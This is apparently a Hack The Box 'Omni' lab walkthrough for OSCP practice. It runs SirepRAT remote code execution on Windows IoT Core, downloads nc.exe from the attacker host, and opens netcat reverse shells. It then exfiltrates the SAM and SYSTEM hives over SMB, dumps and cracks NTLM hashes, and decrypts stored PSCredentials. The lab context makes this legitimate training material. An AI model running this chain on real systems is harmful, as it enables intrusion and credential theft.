In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Enumeration
Nmap output
# Nmap 7.94 scan initiated Sun Oct 29 07:53:31 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/omni/results/10.10.10.204/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/omni/results/10.10.10.204/scans/xml/_quick_tcp_nmap.xml 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up, received user-set (0.38s latency).
Scanned at 2023-10-29 07:53:39 EDT for 39s
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
8080/tcp open upnp syn-ack Microsoft IIS httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 29 07:54:18 2023 -- 1 IP address (1 host up) scanned in 46.66 seconds
Full Nmap
# Nmap 7.94 scan initiated Sun Oct 29 07:53:31 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/HTB/omni/results/10.10.10.204/scans/_full_tcp_nmap.txt -oX /home/kali/HTB/omni/results/10.10.10.204/scans/xml/_full_tcp_nmap.xml 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up, received user-set (0.36s latency).
Scanned at 2023-10-29 07:53:39 EDT for 1013s
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
5985/tcp open upnp syn-ack Microsoft IIS httpd
8080/tcp open upnp syn-ack Microsoft IIS httpd
|_http-title: Site doesn't have a title.
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
29817/tcp open unknown syn-ack
29819/tcp open arcserve syn-ack ARCserve Discovery
29820/tcp open unknown syn-ack
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.94%I=9%D=10/29%Time=653E4A6A%P=x86_64-pc-linux-gnu%r(
SF:NULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,
SF:"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Hello,10,"\*LY\xa5\xfb`\
SF:x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc
SF:9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")
SF:%r(mydoom,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(VerifierAdv
SF:anced,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(HELP4STOMP,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Memcache,10,"\*LY\xa5\xfb
SF:`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(beast2,10,"\*LY\xa5\xfb`\x04G\xa9m\x1
SF:c\xc9}\xc8O\x12")%r(ajp,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")
SF:%r(dominoconsole,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(riak
SF:-pbc,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(epmd,10,"\*LY\xa
SF:5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(vp3,10,"\*LY\xa5\xfb`\x04G\xa9m\
SF:x1c\xc9}\xc8O\x12")%r(kumo-server,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\
SF:xc8O\x12")%r(minecraft-ping,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x
SF:12")%r(teamspeak-tcpquery-ver,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O
SF:\x12")%r(VersionRequest,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")
SF:%r(teamtalk-login,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(ins
SF:teonPLM,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 29 08:10:32 2023 -- 1 IP address (1 host up) scanned in 1020.66 seconds
Couldnt find anything via http on 8080. Just login window and tried all possible. Nothing in source page
Googled Port 29820 and found this article on linkedin –>https://www.linkedin.com/pulse/remote-code-execution-sirep-windows-iot-tanzil-rehman/ and refference to github — https://github.com/SafeBreach-Labs/SirepRATK
Windows IoT Core, by default, has 3 open ports for incoming connections that are used by Sirep. Following are the ports:
1. 29820 - command communication
2. 29819
3. 29817
Git cloned the repo
╭─kali@kali ~/HTB/omni
╰─$ git clone https://github.com/SafeBreach-Labs/SirepRAT.git
Cloning into 'SirepRAT'...
remote: Enumerating objects: 217, done.
remote: Counting objects: 100% (17/17), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 217 (delta 12), reused 11 (delta 11), pack-reused 200
Receiving objects: 100% (217/217), 6.38 MiB | 8.15 MiB/s, done.
Resolving deltas: 100% (138/138), done.
╭─kali@kali ~/HTB/omni
╰─$
POC on the box to download file
╭─kali@kali ~/HTB/omni/SirepRAT ‹master›
╰─$ python SirepRAT.py 10.10.10.204 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
---------
---------
---------
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<FileResult | type: 31, payload length: 824, payload peek: 'b'# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# Th''>
╭─kali@kali ~/HTB/omni/SirepRAT ‹master›
╰─$
PoC to upload file the download it
╭─kali@kali ~/HTB/omni/SirepRAT ‹master›
╰─$ python SirepRAT.py 10.10.10.204 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT worl"d 130 ↵
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
╭─kali@kali ~/HTB/omni/SirepRAT ‹master›
╰─$ python SirepRAT.py 10.10.10.204 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
╭─kali@kali ~/HTB/omni/SirepRAT ‹master›
╰─$ python SirepRAT.py 10.10.10.204 GetFileFromDevice --remote_path "C:\Windows\System32\uploaded.txt" --v
---------
---------
---------
Hello IoT world
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<FileResult | type: 31, payload length: 1332, payload peek: 'b'H\x00e\x00l\x00l\x00o\x00 \x00I\x00o\x00T\x00 \x00w\x00o\x00r\x00l\x00d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00''>
╭─kali@kali ~/HTB/omni/SirepRAT ‹master›
╰─$
We will try with powershell reverse script
Using invoke-PowerShellTcp.ps1 which we edit and add the line Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.39 -Port 444 at the bottom
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.39 -Port 444
set up listener on Kali
╭─kali@kali ~/HTB/omni
╰─$ nc -nlvp 444
listening on [any] 444 ...
We serve nc then run the script twice
╭─kali@kali ~/HTB/omni
╰─$ ls
Invoke-PowerShellTcp.ps1 nc_base64.txt nc.exe results SirepRAT
╭─kali@kali ~/HTB/omni
╰─$ serve 900
The tun0 IP is 10.10.14.39 and the eth0 IP is 192.168.1.10.
Starting HTTP server on port 900...
Serving HTTP on 0.0.0.0 port 900 (http://0.0.0.0:900/) ...
upload the file to machine
╭─kali@kali ~/HTB/omni/SirepRAT ‹master●›
╰─$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-WebRequest -OutFile c:\windows\system32\nc.exe -Uri http://10.10.14.39:900/nc.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
we run nc from the machine while listening in on 444
╭─kali@kali ~/HTB/omni/SirepRAT ‹master●›
╰─$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c nc.exe 10.10.14.39 444 -e cmd.exe"
and we get
╭─kali@kali ~/HTB/omni
╰─$ nc -nlvp 444
listening on [any] 444 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.10.204] 49675
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.
C:\windows\system32>
Sam dumping –> https://www.hackingarticles.in/credential-dumping-sam/
reg save hklm\sam c:\temp\sam
reg save hklm\system c:\temp\system
we do it to the temp folder
C:\Windows\system32\config>reg save HKLM\SYSTEM c:\SYSTEM
reg save HKLM\SYSTEM c:\SYSTEM
The operation completed successfully.
C:\Windows\system32\config>reg save HKLM\SAM c:\SAM
reg save HKLM\SAM c:\SAM
File c:\SAM already exists. Overwrite (Yes/No)?y
The operation completed successfully.
C:\Windows\system32\config>
using smbserver so that we can copy across
╭─kali@kali /usr/share/doc/python3-impacket/examples
╰─$ ./smbserver.py -smb2support share /home/kali/HTB/omni -username test -password test
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.204,49706)
[*] AUTHENTICATE_MESSAGE (\test,omni)
[*] User omni\test authenticated successfully
[*] test:::aaaaaaaaaaaaaaaa:1df7a50dfe721c83096196b1b747074b:010100000000000080631c3b720dda0133a0710428d249aa000000000100100057006700680069004b004c00550044000300100057006700680069004b004c0055004400020010004d0053006f004f006e0072004f004b00040010004d0053006f004f006e0072004f004b000700080080631c3b720dda01060004000200000008003000300000000000000000000000004000004148c16b34543226f456253f12fc19de2a35ddf669a94651ca9f90eac001cf6e0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0033003900000000000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Connecting Share(3:IPC$)
[*] Disconnecting Share(3:IPC$)
SMB share with username and password
./smbserver.py -smb2support share /home/kali/HTB/omni -username test -password test
on the windows machine
net use \\10.10.14.39\share /user:test test /persistent:no
The command completed successfully.
copy the files
C:\>net use \\10.10.14.39\share /user:test test /persistent:no
net use \\10.10.14.39\share /user:test test /persistent:no
The command completed successfully.
C:\>copy SAM \\10.10.14.39\share
copy SAM \\10.10.14.39\share
1 file(s) copied.
C:\>copy SYSTEM \\10.10.14.39\share
copy SYSTEM \\10.10.14.39\share
1 file(s) copied.
dumping the hashes.I used samdump but it gave me hashes without the username.I then tried secretsdump
╭─kali@kali ~/HTB/omni
╰─$ samdump2 SYSTEM SAM > sam.txt
╭─kali@kali ~/HTB/omni
╰─$ cat sam.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
╭─kali@kali ~/HTB/omni
╰─$ /usr/share/doc/python3-impacket/examples/secretsdump.py -sam SAM -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] Cleaning up...
╭─kali@kali ~/HTB/omni
╰─$
output the hashes to hasf file as below
Administrator:a01f16a7fa376962dbeb29a764a06f00
Guest:1d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount:31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount:330fe4fd406f9d0180d67adb0b0dfa65
sshd:1000:91ad590862916cdfd922475caed3acea
DevToolsUser:1b9ce6c5783785717e9bbb75ba5f9958
app:1003:e3cb0651718ee9b4faffe19a51faff95
Found password for app
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
e3cb0651718ee9b4faffe19a51faff95:mesh5143
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
Logging in to the website with the credentials then run the ncat command to get a another reverse shell on 4444
C:\windows\system32\nc.exe 10.10.14.39 4444 -e cmd.exe
╭─kali@kali /usr/share/doc/python3-impacket/examples
╰─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.10.204] 49676
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.
C:\windows\system32>
checking whoami via powershell
PS C:\windows\system32> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
OMNI\app
PS C:\windows\system32>
we check fot the flag
PS C:\data> cd users
cd users
PS C:\data\users> cd app
cd app
PS C:\data\users\app> dir
dir
Directory: C:\data\users\app
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/4/2020 7:28 PM 3D Objects
d-r--- 7/4/2020 7:28 PM Documents
d-r--- 7/4/2020 7:28 PM Downloads
d----- 7/4/2020 7:28 PM Favorites
d-r--- 7/4/2020 7:28 PM Music
d-r--- 7/4/2020 7:28 PM Pictures
d-r--- 7/4/2020 7:28 PM Videos
-ar--- 7/4/2020 8:20 PM 344 hardening.txt
-ar--- 7/4/2020 8:14 PM 1858 iot-admin.xml
-ar--- 7/4/2020 9:53 PM 1958 user.txt
PS C:\data\users\app> type user.txt
type user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">flag</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
</Props>
</Obj>
</Objs>
PS C:\data\users\app> type hardening.txt
type hardening.txt
- changed default administrator password of "p@ssw0rd"
- added firewall rules to restrict unnecessary services
- removed administrator account from "Ssh Users" group
PS C:\data\users\app>
Got tips from this page –> https://ivanitlearning.wordpress.com/2021/03/14/hackthebox-omni/ who got tips from https://devblogs.microsoft.com/scripting/decrypt-powershell-secure-string-password/
PS C:\data\users\app> (Import-CliXml -Path .\user.txt).GetNetworkCredential() | Format-List
(Import-CliXml -Path .\user.txt).GetNetworkCredential() | Format-List(Import-CliXml -Path .\user.txt).GetNetworkCredential() | Format-List
UserName : flag
Password : 7cfd50f6bc34db3204898f1505ad9d70
Domain :
PS C:\data\users\app> (Import-CliXml -Path .\iot-admin.xml).GetNetworkCredential() | Format-List
(Import-CliXml -Path .\iot-admin.xml).GetNetworkCredential() | Format-List(Import-CliXml -Path .\iot-admin.xml).GetNetworkCredential() | Format-List
UserName : administrator
Password : _1nt3rn37ofTh1nGz
Domain : omni
PS C:\data\users\app>
we log in to the website with administrator and _1nt3rn37ofTh1nGz
run the command C:\windows\system32\nc.exe 10.10.14.39 4443 -e cmd.exe
and receive the shell and confirm we are administrator
╭─kali@kali ~/HTB/omni/SirepRAT ‹master●›
╰─$ nc -nlvp 4443
listening on [any] 4443 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.10.204] 49678
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.
C:\windows\system32>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
OMNI\Administrator
PS C:\windows\system32>